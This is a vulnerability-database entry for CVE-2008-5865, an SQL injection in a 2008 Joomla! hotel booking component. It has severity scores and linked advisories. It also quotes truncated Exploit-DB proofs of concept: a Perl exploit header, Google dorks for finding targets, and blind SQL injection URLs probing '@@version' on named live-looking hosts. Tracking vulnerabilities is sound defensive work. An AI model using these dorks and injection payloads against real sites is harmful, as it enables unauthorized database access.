CVE-2008-5865
published 2009-01-06
CVE-2008-5865: SQL injection vulnerability in the com_hbssearch component 1.0 in the Hotel Booking Reservation System (aka HBS) 1.0.0 for Joomla! allows remote attackers to…
Priority P342 · high · 7.5 (CVSS 2.0)
AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 1.01% (58.8th percentile)
SQL injection vulnerability in the com_hbssearch component 1.0 in the Hotel Booking Reservation System (aka HBS) 1.0.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the r_type parameter in a showhoteldetails action to index.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| joomlahbs | hotel_booking_reservation_system | — | — |
GHSA
GHSA-hq84-pvgw-424h: SQL injection vulnerability in the com_hbssearch component 1
ghsa_unreviewed·2022-05-17
CVE-2008-5865 [HIGH] CWE-89 GHSA-hq84-pvgw-424h: SQL injection vulnerability in the com_hbssearch component 1
GHSA
GHSA-p29x-jjv6-hfrh: Multiple SQL injection vulnerabilities in the Hotel Booking Reservation System (aka HBS or com_hbssearch) component for Joomla! allow remote attackers
ghsa_unreviewed·2022-05-02·CVSS 7.5
CVE-2009-3357 [HIGH] CWE-89 GHSA-p29x-jjv6-hfrh: Multiple SQL injection vulnerabilities in the Hotel Booking Reservation System (aka HBS or com_hbssearch) component for Joomla! allow remote attackers
Multiple SQL injection vulnerabilities in the Hotel Booking Reservation System (aka HBS or com_hbssearch) component for Joomla! allow remote attackers to execute arbitrary SQL commands via the (1) h_id, (2) id, and (3) rid parameters to longDesc.php, and the h_id parameter to (4) detail.php, (5) detail1.php, (6) detail2.php, (7) detail3.php, (8) detail4.php, (9) detail5.php, (10) detail6.php, (11) detail7.php, and (12) detail8.php, different vectors than CVE-2008-5865, CVE-2008-5874, and CVE-2008-5875.
No detection rules found.
Exploit-DB
Joomla! Component 5starhotels - SQL Injection
exploitdb·2008-12-24
CVE-2008-5875 Joomla! Component 5starhotels - SQL Injection
---
#!/usr/bin/perl -w
#Joomla com_5starhotels Sql injection#
########################################
#[~] Author : EcHoLL
#[~] www.warezturk.org www.tahribat.com
#[~] Greetz : Black_label TURK Godlike Nitrous
#[!] Module_Name: com_5starhotels
#[!] Script_Name: Joomla
#[!] Google_Dork: inurl:"com_5starhotels"
########################################
system("color FF0000");
system("Nohacking");
print "\t\t-------------------------------------------------------------\n\n";
print "\t\t| Turkish Securtiy Team |\n\n";
print "\t\t-------------------------------------------------------------\n\n";
print "\t\t|Joomla Module com_5starhotels(showhoteldetails&id=)Remote SQL Injection Vuln|\n\n";
print "\t\t| Coded by: EcHoLL www.warezturk.org |\n\
Exploit-DB
Joomla! Component com_lowcosthotels - Blind SQL Injection
exploitdb·2008-12-23
CVE-2008-5875 Joomla! Component com_lowcosthotels - Blind SQL Injection
---
Joomla Component com_lowcosthotels (id) Blind SQL Injection Vulnerability
Author: Hussin X
Home : www.IQ-TY.com & www.TrYaG.cc
script : http://www.joomlahbs.com/
DorK : inurl:index.php?option=com_lowcosthotels
Demo :
http://www.leveltensolutions.net/spa/index.php?option=com_lowcosthotels&task=showhoteldetails&id=13+and%20substring(@@version,1,1)=5
http://www.leveltensolutions.net/spa/index.php?option=com_lowcosthotels&task=showhoteldetails&id=13+and%20substring(@@version,1,1)=4
or
http://demo.joomlahbs.com/v1/index.php?option=com_lowcosthotels&task=showhoteldetails&id=13+and%20substring(@@version,1,1)=5
http://demo.joomlahbs.com/v1/index.php?option=com_lowcosthotels&task=showhoteldetails&id=13+and%20substring(@@
Exploit-DB
Joomla! Component com_tophotelmodule 1.0 - Blind SQL Injection
exploitdb·2008-12-21
CVE-2008-5865 Joomla! Component com_tophotelmodule 1.0 - Blind SQL Injection
---
#############################################################
Joomla Component com_tophotelmodule(id) Blind SQL-injection
#############################################################
###################################################
#[~] Author : boom3rang
#[~] Kosova Hackers Group [www.khg-crew.ws]
#[~] Greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1.
#[!] Top Hotel Module
#[!] 06/07/2008
#[!] Joomla HBS
#[!] [email protected]
#[!] http://joomlahbs.com
#[!] 1.0.0
###################################################
Example:
http://demo.joomlahbs.com/p2/index.php?option=com_tophotelmodule&task=showhoteldetails&id=[SQL-vulnerability]
LiveDEMO:
http://demo.joomlahbs.com/p2/index.php?option
Exploit-DB
Joomla! Component com_hbssearch 1.0 - Blind SQL Injection
exploitdb·2008-12-21
CVE-2008-5865 Joomla! Component com_hbssearch 1.0 - Blind SQL Injection
---
#############################################################
Joomla Component com_hbssearch(r_type) Blind SQL-injection
#############################################################
###################################################
#[~] Author : boom3rang
#[~] Kosova Hackers Group [www.khg-crew.ws]
#[~] Greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1.
#[!] Joomla HBS
#[!] Administrator
#[!] [email protected]
#[!] http://joomlahbs.com
#[!] 1.0.0
###################################################
Example:
http://localhost/Path/index.php?option=com_hbssearch&task=showhoteldetails&id=1&r_type=[SQL-vulnerability]
LiveDEMO:
http://demo.joomlahbs.com/p1/index.php?option=com_hbssearch&task=showhote
No writeups or analysis indexed.
http://secunia.com/advisories/33215
http://securityreason.com/securityalert/4870
http://www.securityfocus.com/bid/32951
https://exchange.xforce.ibmcloud.com/vulnerabilities/47539
https://www.exploit-db.com/exploits/7538